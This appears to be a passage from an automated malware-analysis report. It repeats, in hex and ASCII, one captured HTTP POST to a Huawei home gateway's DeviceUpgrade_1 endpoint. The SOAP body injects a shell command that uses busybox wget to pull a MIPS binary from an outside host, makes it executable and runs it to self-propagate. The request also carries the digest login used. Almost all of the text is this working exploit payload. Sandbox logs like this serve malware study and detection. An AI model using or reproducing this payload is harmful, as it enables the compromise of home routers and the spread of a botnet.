74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 